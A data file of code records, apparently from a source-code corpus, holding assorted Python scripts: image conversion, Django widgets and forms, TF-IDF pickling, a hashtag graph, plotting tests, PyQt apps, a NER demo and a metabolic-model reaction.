"usage_type": "call"}, {"api_name": "nilearn.image", "line_number": 81, "usage_type": "name"}, {"api_name": "nilearn.image.mean_img", "line_number": 82, "usage_type": "call"}, {"api_name": "nilearn.image", "line_number": 82, "usage_type": "name"}, {"api_name": "nilearn.input_data.NiftiMasker", "line_number": 88, "usage_type": "call"}, {"api_name": "nilearn.image.index_img", "line_number": 108, "usage_type": "call"}, {"api_name": "nilearn.image", "line_number": 108, "usage_type": "name"}, {"api_name": "warnings.simplefilter", "line_number": 119, "usage_type": "call"}, {"api_name": "fmralign.pairwise_alignment.PairwiseAlignment", "line_number": 128, "usage_type": "call"}, {"api_name": "fmralign._utils.voxelwise_correlation", "line_number": 133, "usage_type": "call"}, {"api_name": "nilearn.plotting.plot_stat_map", "line_number": 134, "usage_type": "call"}, {"api_name": "nilearn.plotting", "line_number": 134, "usage_type": "name"}]} +{"seq_id": "225642609", "text": "from __future__ import print_function\nimport dxchange\nimport os\nimport scipy.misc\n\nfiles = os.listdir('betap')\nfor name in files:\n\tprint(name)\n\ta = dxchange.read_tiff('betap/'+name)\n\tprint(a.shape)\n\tscipy.misc.toimage(a, cmin=0, cmax=0.0000311).save('png/beta/'+str(os.path.splitext(name)[0])+'.png')\n\nfiles = os.listdir('deltap')\nfor name in files:\n\ta = dxchange.read_tiff('deltap/'+name)+0.0000183\n\tscipy.misc.toimage(a, cmin=-0.0000508+0.0000183, cmax=0.000127+0.0000183).save('png/delta/'+str(os.path.splitext(name)[0])+'.png')\n\n\n", "sub_path": "tmpscripts/convert_png.py", "file_name": "convert_png.py", "file_ext": "py", "file_size_in_byte": 534, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.listdir", "line_number": 6, "usage_type": "call"}, {"api_name": "dxchange.read_tiff", "line_number": 9, "usage_type": "call"}, {"api_name": "scipy.misc.misc.toimage", "line_number": 11, "usage_type": "call"}, {"api_name": "scipy.misc.misc", "line_number": 11, "usage_type": "attribute"}, {"api_name": "scipy.misc", "line_number": 11, "usage_type": "name"}, {"api_name": "os.path.splitext", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 13, "usage_type": "call"}, {"api_name": "dxchange.read_tiff", "line_number": 15, "usage_type": "call"}, {"api_name": "scipy.misc.misc.toimage", "line_number": 16, "usage_type": "call"}, {"api_name": "scipy.misc.misc", "line_number": 16, "usage_type": "attribute"}, {"api_name": "scipy.misc", "line_number": 16, "usage_type": "name"}, {"api_name": "os.path.splitext", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}]} +{"seq_id": "603173403", "text": "from django import forms\nfrom django.utils.safestring import mark_safe\nfrom django.db.models import CharField\nfrom django.conf import settings\n\n\nclass ColorPickerWidget(forms.TextInput):\n class Media:\n css = {\n 'all': (\n '/static/css/project/colorpicker.css',\n )\n }\n\n js = (\n '/static/js/project/picker-csrf.js',\n '/static//js/jquery-1.11.1.min.js',\n '/static/js/project/colorpicker.js',\n \n )\n\n def __init__(self, language=None, attrs=None):\n self.language = language or settings.LANGUAGE_CODE[:2]\n super(ColorPickerWidget, self).__init__(attrs=attrs)\n\n def render(self, id, value, attrs=None):\n rendered = super(ColorPickerWidget, self).render(id, value, attrs)\n return rendered + 
mark_safe(u'''''' % id)\n\n\nclass ColorField(CharField):\n def __init__(self, *args, **kwargs):\n kwargs['max_length'] = 10\n super(ColorField, self).__init__(*args, **kwargs)\n\n def formfield(self, **kwargs):\n kwargs['widget'] = ColorPickerWidget\n return super(ColorField, self).formfield(**kwargs)\n", "sub_path": "mkochman-szpila-865f30290cad/fields.py", "file_name": "fields.py", "file_ext": "py", "file_size_in_byte": 1533, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.forms.TextInput", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 7, "usage_type": "name"}, {"api_name": "django.conf.settings.LANGUAGE_CODE", "line_number": 23, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 23, "usage_type": "name"}, {"api_name": "django.utils.safestring.mark_safe", "line_number": 28, "usage_type": "call"}, {"api_name": "django.db.models.CharField", "line_number": 45, "usage_type": "name"}]} +{"seq_id": "557877702", "text": "# -*- coding: utf-8 -*-\nimport matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport pickle\nimport random\nimport numpy as np\nimport os\nimport time\nimport sys\n\ndef flatten():\n cwd = os.getcwd()\n txtdir = cwd + '/occ_letters'\n print (txtdir)\n files = os.listdir(txtdir)\n doc_contents = []\n txt_names = []\n doc_names = []\n filenames = []\n for i in files:\n fname = txtdir + '/' + i\n with open(fname, 'rb') as f:\n contents = f.read()\n try:\n contents = contents.decode('utf-8')\n txt_names.append(i)\n doc_names.append(i.replace('.txt', '.pdf'))\n pdf_name = '../../../files/' + i.replace('.txt', '.pdf')\n filenames.append(pdf_name)\n doc_contents.append(contents)\n f.close()\n except:\n print ('Didnt work: {0}'.format(i))\n return doc_contents, txt_names, doc_names, filenames\n\n\n\nstart_time = time.time()\nprint (start_time)\ndoc_contents, txt_names, doc_names, filenames = flatten()\nprint ('length of contents: ', len(doc_contents))\nprint(\"--- %s seconds ---\" % (time.time() - start_time))\nstart_time = time.time()\n\nwith open('../reglist/pickle/txt_names_occ.pickle', 'wb') as handle:\n pickle.dump(txt_names, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\nwith open('../reglist/pickle/filenames_occ.pickle', 'wb') as handle:\n pickle.dump(filenames, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\nwith open('../reglist/pickle/doc_names_occ.pickle', 'wb') as handle:\n pickle.dump(doc_names, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\nwith open('../reglist/pickle/doc_contents_occ.pickle', 'wb') as handle:\n pickle.dump(doc_contents, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n#sys.exit()\ninput('enter')\n\ntf = TfidfVectorizer(analyzer='word',\n ngram_range=(1,3),\n min_df = 0,\n stop_words = 'english',\n token_pattern=r'\\S+',\n lowercase = True)\n\nprint ('Vectorizer complete')\nprint(\"--- %s seconds ---\" % (time.time() - start_time))\n\ntfidf_matrix = tf.fit_transform(doc_contents)\nprint ('Fit_transform complete')\nprint(\"--- %s seconds ---\" % (time.time() - start_time))\n\nfeature_names = tf.get_feature_names()\nprint ('Length of feature names: ', len(feature_names))\n\nprint(\"--- %s seconds ---\" % (time.time() - start_time))\nstart_time = time.time()\n#--- 26.7841911316 seconds ---\n\n\n\nprint ('pickling...\\n\\n')\n\nwith open('../reglist/pickle/feature_names_occ.pickle', 'wb') as handle:\n pickle.dump(feature_names, 
handle, protocol=pickle.HIGHEST_PROTOCOL)\n\nwith open('../reglist/pickle/tfidf_matrix_occ.pickle', 'wb') as handle:\n    pickle.dump(tfidf_matrix, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\nprint(\"--- %s seconds ---\" % (time.time() - start_time))\nstart_time = time.time()\n\nwhile True:\n    s = random.sample(feature_names, 10)\n    print (s)\n    input('enter')", "sub_path": "tfidf/occ_tfidf.py", "file_name": "occ_tfidf.py", "file_ext": "py", "file_size_in_byte": 2995, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "matplotlib.use", "line_number": 3, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 14, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 17, "usage_type": "call"}, {"api_name": "time.time", "line_number": 40, "usage_type": "call"}, {"api_name": "time.time", "line_number": 44, "usage_type": "call"}, {"api_name": "time.time", "line_number": 45, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 48, "usage_type": "call"}, {"api_name": "pickle.HIGHEST_PROTOCOL", "line_number": 48, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 51, "usage_type": "call"}, {"api_name": "pickle.HIGHEST_PROTOCOL", "line_number": 51, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 54, "usage_type": "call"}, {"api_name": "pickle.HIGHEST_PROTOCOL", "line_number": 54, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 57, "usage_type": "call"}, {"api_name": "pickle.HIGHEST_PROTOCOL", "line_number": 57, "usage_type": "attribute"}, {"api_name": "sklearn.feature_extraction.text.TfidfVectorizer", "line_number": 62, "usage_type": "call"}, {"api_name": "time.time", "line_number": 70, "usage_type": "call"}, {"api_name": "time.time", "line_number": 74, "usage_type": "call"}, {"api_name": "time.time", "line_number": 79, "usage_type": "call"}, {"api_name": "time.time", "line_number": 80, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 88, "usage_type": "call"}, {"api_name": "pickle.HIGHEST_PROTOCOL", "line_number": 88, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 91, "usage_type": "call"}, {"api_name": "pickle.HIGHEST_PROTOCOL", "line_number": 91, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 93, "usage_type": "call"}, {"api_name": "time.time", "line_number": 94, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 97, "usage_type": "call"}]} +{"seq_id": "345211767", "text": "import json\nimport sys\nimport time\nimport fileinput\n\nclass Edge:\n\n    def __init__(self, node1, node2):\n        self.node1 = node1\n        self.node2 = node2\n\n\nclass Node:\n\n    def __init__(self, timestamp, name):\n        self.timestamp = timestamp\n        self.name = name\n\n\nnodes_on_timestamp = []\nglobal_edges = {}\nwrite_file = open(sys.argv[2], 'w')\n\nfor line in fileinput.input(sys.argv[1]):\n    json_obj = json.loads(line)\n    if \"created_at\" in json_obj:\n        timestamp = time.mktime(time.strptime(json_obj[\"created_at\"], \"%a %b %d %H:%M:%S +0000 %Y\"))\n        if len(nodes_on_timestamp) > 0:\n            test_node = nodes_on_timestamp[0]\n            while test_node is not None and timestamp - test_node.timestamp > 60:\n                # iterate over a snapshot of the keys so stale edges can be\n                # removed from the dict while looping\n                for key in list(global_edges.keys()):\n                    if test_node.name in key:\n                        global_edges.pop(key, None)\n                nodes_on_timestamp.pop(0)\n                if len(nodes_on_timestamp) > 0:\n                    test_node = nodes_on_timestamp[0]\n                else:\n                    test_node = None\n\n        if 
len(json_obj[\"entities\"][\"hashtags\"]) > 1:\n\n            for i in range(len(json_obj[\"entities\"][\"hashtags\"])):\n                first_node = Node(timestamp, json_obj[\"entities\"][\"hashtags\"][i][\"text\"])\n                nodes_on_timestamp.append(first_node)\n                nodes_on_timestamp = sorted(nodes_on_timestamp, key=lambda node: node.timestamp)\n                for j in range(i + 1, len(json_obj[\"entities\"][\"hashtags\"])):\n                    second_node = Node(timestamp, json_obj[\"entities\"][\"hashtags\"][j][\"text\"])\n                    global_edges[first_node.name + second_node.name] = Edge(first_node, second_node)\n                    global_edges[second_node.name + first_node.name] = Edge(second_node, first_node)\n\n        if len(nodes_on_timestamp) > 0:\n            average = len(global_edges)/len(nodes_on_timestamp)\n            write_file.write(str(round(average, 2)) + \"\\n\")\n\n\n", "sub_path": "src/average_degree.py", "file_name": "average_degree.py", "file_ext": "py", "file_size_in_byte": 2077, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "sys.argv", "line_number": 22, "usage_type": "attribute"}, {"api_name": "fileinput.input", "line_number": 24, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 24, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 25, "usage_type": "call"}, {"api_name": "time.mktime", "line_number": 27, "usage_type": "call"}, {"api_name": "time.strptime", "line_number": 27, "usage_type": "call"}]} +{"seq_id": "634828396", "text": "##############################################################################\n# Institute for the Design of Advanced Energy Systems Process Systems\n# Engineering Framework (IDAES PSE Framework) Copyright (c) 2018-2019, by the\n# software owners: The Regents of the University of California, through\n# Lawrence Berkeley National Laboratory, National Technology & Engineering\n# Solutions of Sandia, LLC, Carnegie Mellon University, West Virginia\n# University Research Corporation, et al. All rights reserved.\n#\n# Please see the files COPYRIGHT.txt and LICENSE.txt for full copyright and\n# license information, respectively. 
Both files are also available online\n# at the URL \"https://github.com/IDAES/idaes-pse\".\n##############################################################################\n\"\"\"\nTests for idaes.vis.plotbase\n\"\"\"\n# third-party\nimport pytest\nimport pandas as pd\n# package\nfrom idaes.vis import plotbase\n\n\ndef test_plotbase_construct_abstract():\n assert pytest.raises(TypeError, plotbase.PlotBase, 'foo')\n\n\ndef test_plotregistry_construct():\n reg = plotbase.PlotRegistry()\n\n\ndef test_plotregistry_register():\n reg = plotbase.PlotRegistry()\n reg.remove_all()\n obj = \"hello\"\n plot_class = plotbase.PlotBase\n reg.register(obj, \"test1\", plot_class)\n reg.remove_all()\n\n\ndef setup_plot(plot, obj):\n return plot, obj\n\n\ndef test_plotregistry_register_setup():\n reg = plotbase.PlotRegistry()\n reg.remove_all()\n obj = \"hello\"\n plot_class = plotbase.PlotBase\n reg.register(obj, \"test1\", plot_class, setup_fn=setup_plot)\n\n\ndef test_plotregistry_register_overwrite():\n reg = plotbase.PlotRegistry()\n reg.remove_all()\n obj = \"hello\"\n plot_class = plotbase.PlotBase\n reg.register(obj, \"test1\", plot_class)\n # without overwrite: KeyError\n assert pytest.raises(\n KeyError, reg.register, obj, \"test1\", plot_class, dict(setup_fn=setup_plot)\n )\n # with overwrite: ok\n reg.register(obj, \"test1\", plot_class, overwrite=True)\n\n\ndef test_plotregistry_get():\n reg = plotbase.PlotRegistry()\n reg.remove_all()\n obj = \"hello\"\n plot_class = plotbase.PlotBase\n reg.register(obj, \"test1\", plot_class, setup_fn=setup_plot)\n result = reg.get(obj, \"test1\")\n assert result == (plot_class, obj)\n\n\nclass DummyPlot(plotbase.PlotBase):\n def __init__(self):\n super().__init__(None)\n\n def annotate(self, x, y, label: str):\n return\n\n def resize(self, height: int = -1, width: int = -1):\n return\n\n def save(self, destination: str):\n return 'filename'\n\n def show(self, in_notebook=True):\n return\n\n\n@pytest.fixture\ndef plotdf():\n return pd.DataFrame({'x': [1, 2], 'y1': [1, 2], 'y2': [1, 2]})\n\n\ndef test_validate(plotdf):\n # reject\n for bad_args, bad_kwargs in [\n ((None, None, None), {}),\n ((None, None, None), {'legend': 'i_am'}),\n ((None, 'x', []), {}),\n ((plotdf, 'x', ['z']), {}),\n ((plotdf, 'foo', ['y1']), {}),\n ]:\n plot = DummyPlot()\n result, msg = plot.validate(*bad_args, **bad_kwargs)\n assert result is False\n # pass\n for good_args, good_kwargs in [\n ((plotdf, 'x', ['y1']), {}),\n ((plotdf, 'x', ['y1', 'y2']), {}),\n ((plotdf, 'x', ['y1']), {'legend': 'foo'}),\n ]:\n plot = DummyPlot()\n result, msg = plot.validate(*good_args, **good_kwargs)\n assert result is True\n", "sub_path": "idaes/vis/tests/test_plotbase.py", "file_name": "test_plotbase.py", "file_ext": "py", "file_size_in_byte": 3411, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pytest.raises", "line_number": 24, "usage_type": "call"}, {"api_name": "idaes.vis.plotbase.PlotBase", "line_number": 24, "usage_type": "attribute"}, {"api_name": "idaes.vis.plotbase", "line_number": 24, "usage_type": "name"}, {"api_name": "idaes.vis.plotbase.PlotRegistry", "line_number": 28, "usage_type": "call"}, {"api_name": "idaes.vis.plotbase", "line_number": 28, "usage_type": "name"}, {"api_name": "idaes.vis.plotbase.PlotRegistry", "line_number": 32, "usage_type": "call"}, {"api_name": "idaes.vis.plotbase", "line_number": 32, "usage_type": "name"}, {"api_name": "idaes.vis.plotbase.PlotBase", "line_number": 35, "usage_type": 
"attribute"}, {"api_name": "idaes.vis.plotbase", "line_number": 35, "usage_type": "name"}, {"api_name": "idaes.vis.plotbase.PlotRegistry", "line_number": 45, "usage_type": "call"}, {"api_name": "idaes.vis.plotbase", "line_number": 45, "usage_type": "name"}, {"api_name": "idaes.vis.plotbase.PlotBase", "line_number": 48, "usage_type": "attribute"}, {"api_name": "idaes.vis.plotbase", "line_number": 48, "usage_type": "name"}, {"api_name": "idaes.vis.plotbase.PlotRegistry", "line_number": 53, "usage_type": "call"}, {"api_name": "idaes.vis.plotbase", "line_number": 53, "usage_type": "name"}, {"api_name": "idaes.vis.plotbase.PlotBase", "line_number": 56, "usage_type": "attribute"}, {"api_name": "idaes.vis.plotbase", "line_number": 56, "usage_type": "name"}, {"api_name": "pytest.raises", "line_number": 59, "usage_type": "call"}, {"api_name": "idaes.vis.plotbase.PlotRegistry", "line_number": 67, "usage_type": "call"}, {"api_name": "idaes.vis.plotbase", "line_number": 67, "usage_type": "name"}, {"api_name": "idaes.vis.plotbase.PlotBase", "line_number": 70, "usage_type": "attribute"}, {"api_name": "idaes.vis.plotbase", "line_number": 70, "usage_type": "name"}, {"api_name": "idaes.vis.plotbase.PlotBase", "line_number": 76, "usage_type": "attribute"}, {"api_name": "idaes.vis.plotbase", "line_number": 76, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 95, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 93, "usage_type": "attribute"}]} +{"seq_id": "171086518", "text": "from PyQt5.QtWidgets import *\nfrom mainUi import Ui_MainMenu\nimport sys\nimport time\nimport json\n\n\nclass Creator(QMainWindow):\n def __init__(self):\n super().__init__()\n self.ui = Ui_MainMenu()\n self.ui.setupUi(self)\n self.deviceChange = self.ui.comboBox\n self.createButton = self.ui.pushButton_3\n self.deviceChange.addItem(\"Basınç Sensörü\")\n self.deviceChange.addItem(\"Kuyu Merkez Cihazı\")\n self.deviceChange.addItem(\"Hava Sensörü\")\n self.deviceChange.addItem(\"Merkezli Hava Sensörü\")\n self.deviceChange.addItem(\"Toprak Sensörü\")\n self.createButton.clicked.connect(self.olustur)\n self.typeName = str(self.deviceChange.currentText())\n self.type = str(self.deviceChange.currentIndex() - 1)\n self.dailProductionNumber = None\n self.deviceCreatedate = time.strftime(\"%y\" + \"%m\" + \"%d\")\n\n def olustur(self):\n self.checkday()\n for i in range(self.deviceChange.count()):\n if self.deviceChange.currentIndex() == i:\n self.idWrite(i)\n break\n\n\n def checkday(self):\n \"\"\"\n :param tarih: str\n \"\"\"\n with open(\"list.json\") as data_file:\n data = json.load(data_file)\n\n lastDevice = data[\"device\"][Creator.typeName][-1]\n lastDeviceDate = lastDevice[\"id\"]\n lastDeviceDailyProductionNumber = lastDevice[\"datenumber\"]\n if lastDeviceDate[0:6] != Creator.deviceCreatedate:\n self.dailyProductionNumber = 0\n else:\n self.dailyProductionNumber = lastDeviceDailyProductionNumber\n\n def idWrite(self,deviceType):\n \"\"\"\n :param chechday: boolean\n :param deviceType: int\n \"\"\"\n with open(\"list.json\") as data_file:\n data = json.load(data_file)\n date = str(Creator.deviceCreatedate)\n type = str(deviceType)\n id = str(date + type + str(self.dailyProductionNumber))\n number = str(self.dailyProductionNumber)\n send = {\"datenumber\": number,\n \"id\": id,\n \"deviceType\": type\n }\n data[\"device\"][Creator.typeName] = []\n data[\"device\"][Creator.typeName].append(send)\n with open(\"list.json\", \"w\", encoding='utf-8') as f:\n json.dump(data, f, ensure_ascii=False, 
indent=4)\n\nif __name__ == \"__main__\":\n    app = QApplication(sys.argv)\n    creator = Creator()\n    creator.show()\n    sys.exit(app.exec())\n", "sub_path": "Creator.py", "file_name": "Creator.py", "file_ext": "py", "file_size_in_byte": 2489, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "mainUi.Ui_MainMenu", "line_number": 11, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 24, "usage_type": "call"}, {"api_name": "json.load", "line_number": 39, "usage_type": "call"}, {"api_name": "json.load", "line_number": 55, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 67, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 70, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 73, "usage_type": "call"}]} +{"seq_id": "230076382", "text": "# -*- coding: utf-8 -*-\nimport datetime\nfrom pre_processing import *\nflag = \"\"\nprint(\"\\nEnter your own sentence, or press Enter to see the default example:\")\nsentence = input()\n\nwhile flag != 'exit':\n\tif not sentence:\n\t\tsentence = u\"7月19日至28日,国家主席习近平将对阿联酋、塞内加尔、卢旺达和南非进行国事访问,出席在南非约翰内斯堡举行的金砖国家领导人第十次会晤,\"\\\n\t\t\t\t\t\"过境毛里求斯并进行友好访问。此次中东非洲之行是习近平连任国家主席后的首次出访,是国际形势深刻演变背景下中国面向发展中国家的重\"\\\n\t\t\t\t\t\"大外交行动,意义重大,世界瞩目。\"\n\t\tprint(\"Example sentence: \" + sentence)\n\tstart_time = datetime.datetime.now()\n\tentity_name, entity_tags = predict(sentence)\n\tprint(\"**********Recognition results**********\")\n\tprint_result(entity_name, entity_tags)\n\tend_time = datetime.datetime.now()\n\trun_time = (end_time - start_time).total_seconds() * 1000\n\tprint(\"**********finished in %.2f ms**********\" % run_time)\n\n\tprint(\"\\nEnter another sentence, or type 'exit' to quit\")\n\tflag = input()\n\tif flag != 'exit':\n\t\tsentence = flag\n\telse:\n\t\tflag = flag\n\nprint('\\nGoodbye')\n\t", "sub_path": "trained_model/predict.py", "file_name": "predict.py", "file_ext": "py", "file_size_in_byte": 1187, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "datetime.datetime.now", "line_number": 14, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 14, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 18, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 18, "usage_type": "attribute"}]} +{"seq_id": "385468909", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[2]:\n\n\n# urocanate reactions\ndef urocanate_reaction(model):\n    import cobra\n    from cobra import Model, Reaction, Metabolite\n# get the existing metabolites or create new ones in the model\n    M_his__L = model.metabolites.get_by_id('his__L_c')\n    M_nh4 = model.metabolites.get_by_id('nh4_c')\n    M_urcan = Metabolite(\n        'urocanate_c',\n        formula = 'C6H5N2O2',\n        name = 'urocanate',\n        compartment = 'c')\n# add metabolites inside the biomass function\n    R_biomass = model.reactions.get_by_id(\"BIOMASS_Ec_iML1515_WT_75p37M\")\n    R_biomass.add_metabolites(\n        {\n            M_urcan: 0.000291950497833333\n\n        }\n    )\n# create the reaction and add metabolites inside\n# Unification Links: BRENDA:4.3.1.3, ENZYME:4.3.1.3, IUBMB-ExplorEnz:4.3.1.3\n    R_HAL = Reaction('HAL')\n    R_HAL.name = 'Histidine Ammonia-lyase Reaction'\n    R_HAL.add_metabolites({\n        M_his__L: -1.0,\n        M_nh4: 1.0,\n        M_urcan: 1.0})\n\n    model.add_reactions([R_HAL])\n    return model\n# cobra.io.sbml.write_sbml_model(model,'iML1515_urocan_reaction.xml')\n    #\n\n\n# In[3]:\n\n\n# import cobra\n# from cobra import Model, Reaction, Metabolite\n# model= cobra.io.read_sbml_model('iML1515.xml')\n# 
urocanate_reaction(model)\n\n\n# In[ ]:\n\n\n\n\n", "sub_path": "files made by Ke/add reaction function/reaction pythonfile/urocanate_reaction_function.py", "file_name": "urocanate_reaction_function.py", "file_ext": "py", "file_size_in_byte": 1296, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "cobra.Metabolite", "line_number": 14, "usage_type": "call"}, {"api_name": "cobra.Reaction", "line_number": 29, "usage_type": "call"}]} +{"seq_id": "67053620", "text": "# -*- coding: utf-8 -*-\nfrom django import forms\n\n\nLISTING_TYPE_CHOICES = [\n ('gold_premium', 'Diamante'),\n ('gold', 'Ouro'),\n ('silver', 'Prata'),\n ('bronze', 'Bronze'),\n ('free', 'Grátis'),\n]\n\nCONDITIONS = [\n ('new', 'Novo'),\n ('used', 'Usado')\n]\n\nBUYING_MODE = [\n ('buy_it_now', 'Vender agora'),\n ('auction', 'Leilão')\n]\n\nclass ProdutoPublicarForm(forms.Form):\n\n title = forms.CharField(max_length=128)\n subtitle = forms.CharField(max_length=256)\n description = forms.CharField(widget=forms.Textarea())\n listing_type_id = forms.ChoiceField(choices=LISTING_TYPE_CHOICES)\n condition = forms.ChoiceField(choices=CONDITIONS)\n buying_mode = forms.ChoiceField(choices=BUYING_MODE)\n price = forms.DecimalField()\n available_quantity = forms.IntegerField()", "sub_path": "loja/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 803, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.forms.Form", "line_number": 23, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 23, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 25, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 25, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 26, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 26, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 27, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 27, "usage_type": "name"}, {"api_name": "django.forms.Textarea", "line_number": 27, "usage_type": "call"}, {"api_name": "django.forms.ChoiceField", "line_number": 28, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 28, "usage_type": "name"}, {"api_name": "django.forms.ChoiceField", "line_number": 29, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 29, "usage_type": "name"}, {"api_name": "django.forms.ChoiceField", "line_number": 30, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 30, "usage_type": "name"}, {"api_name": "django.forms.DecimalField", "line_number": 31, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 31, "usage_type": "name"}, {"api_name": "django.forms.IntegerField", "line_number": 32, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 32, "usage_type": "name"}]} +{"seq_id": "561989715", "text": "#!/usr/bin/env python3\n\nfrom PyQt5.QtCore import QDir, Qt, QEvent, QRect, QPoint, QTimer\nfrom PyQt5.QtGui import QImage, QPainter, QPalette, QPixmap, QColor, QScreen, \\\n QWindow, QRegion, QIcon, QVector2D\nfrom PyQt5.QtWidgets import QAction, QApplication, QFileDialog, QLabel, \\\n QMainWindow, QMenu, QMessageBox, QScrollArea, QSizePolicy, QDialog\nimport pyuv\nimport pyuv.error\nimport json\nimport jsonrpc\nimport sys\nimport math\nimport random\nimport inspect\nimport functools\n\nclass Ghost(QMainWindow):\n def 
__init__(self, use_title_bar=False, always_on_top=False, name=sys.argv[0], opacity=None):\n        super().__init__()\n        self.use_title_bar = use_title_bar\n        self.always_on_top = always_on_top\n\n        if self.use_title_bar:\n            self.setAttribute(Qt.WA_NoSystemBackground)\n            self.setAttribute(Qt.WA_TranslucentBackground)\n        else:\n            self.setWindowFlags(self.windowFlags() | Qt.FramelessWindowHint)\n\n        if self.always_on_top:\n            self.setWindowFlags(self.windowFlags() | Qt.WindowStaysOnTopHint)\n\n        self.name = name\n        self.setWindowTitle(self.name)\n        self.balloons = []\n\n        self.imageLabel = QLabel()\n        # self.imageLabel.setAttribute(Qt.WA_MouseNoMask)\n        self.setCentralWidget(self.imageLabel)\n\n        if opacity is not None:\n            self.setWindowOpacity(opacity)\n\n        self.createActions()\n        self.createMenus()\n\n    def loadImage(self, fileName):\n        image = QImage(fileName)\n        assert not image.isNull()\n\n        pixmap = QPixmap.fromImage(image)\n        mask = pixmap.createMaskFromColor(QColor(image.pixel(0,0)), Qt.MaskInColor)\n        if self.use_title_bar:\n            pixmap.setMask(mask)\n            self.imageLabel.setMask(mask)\n        else:\n            self.setMask(mask)\n\n        self.imageLabel.setPixmap(pixmap)\n        self.imageLabel.adjustSize()\n        self.setFixedSize(image.size())\n\n        self.landOnScreen()\n\n    def landOnScreen(self):\n        screen = QApplication.screens()[0].size()\n        self.move(self.x(), screen.height() - self.height()\n                  + self.y() - self.geometry().y())\n\n    def speak(self, text):\n        balloon = Balloon(text, point=self.newBalloonPoint(), parent=self)\n        def closure(ev):\n            try:\n                self.balloons.remove(balloon)\n            except ValueError:\n                pass\n        balloon.destroyed.connect(closure)\n        self.balloons.append(balloon)\n        balloon.show()\n        # before show(), the size() has not been calculated yet\n        # use integer division: QPoint requires int arguments\n        pos = balloon.pos() - QPoint(balloon.width() // 2, balloon.height() // 2)\n        if pos.x() < 0: pos.setX(0)\n        if pos.y() < 0: pos.setY(0)\n        screen = QApplication.screens()[0].size() - balloon.size()\n        if screen.width() < pos.x(): pos.setX(screen.width())\n        if screen.height() < pos.y(): pos.setY(screen.height())\n        balloon.move(pos)\n\n    def newBalloonPoint(self):\n        screen = QApplication.screens()[0].size()\n        headradius = min(self.width(), self.height()) // 2\n        pos = self.pos() + QPoint(headradius, headradius)\n        tocenter = QVector2D(screen.width()/2-pos.x(), screen.height()/2-pos.y())\n        radorig = math.atan2(tocenter.y(), tocenter.x())\n        raddiff = random.gauss(0, 0.5**2)*math.pi\n        radius = headradius * random.uniform(1.6,2.2)\n        diff = QPoint(int(radius*math.cos(radorig+raddiff)), int(radius*math.sin(radorig+raddiff)))\n        return pos + diff\n\n    def moveByName(self, name):\n        dic = {\n            'left': 0,\n            'right': QApplication.screens()[0].size().width(),\n            'center': QApplication.screens()[0].size().width()//2-self.width()//2,\n        }\n        self.move(dic[name], self.y())\n\n    def closeEvent(self, ev):\n        for balloon in self.balloons:\n            balloon.close()\n\n    def dropEvent(self, ev):\n        self.landOnScreen()\n\n    def mousePressEvent(self, ev):\n        super().mousePressEvent(ev)\n        self.dragAnchor = ev.pos()\n\n    def mouseMoveEvent(self, 